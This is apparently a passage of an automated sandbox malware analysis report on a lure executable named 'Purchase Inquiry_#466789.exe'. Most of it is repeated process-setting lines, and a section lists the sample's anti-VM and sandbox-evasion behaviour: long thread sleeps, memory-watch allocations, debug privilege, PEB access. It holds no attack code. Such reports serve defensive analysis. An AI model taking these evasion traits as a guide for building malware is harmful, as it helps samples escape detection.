                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_#466789.exe PID: 1880, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 7530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 8BA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: 9BA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe TID: 3260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe TID: 7248Thread sleep time: -780000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeThread delayed: delay time: 60000Jump to behavior
                  Source: Purchase Inquiry_#466789.exe, 00000002.00000002.2909018268.00000000011B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeProcess created: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe "C:\Users\user\Desktop\Purchase Inquiry_#466789.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Users\user\Desktop\Purchase Inquiry_#466789.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Inquiry_#466789.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
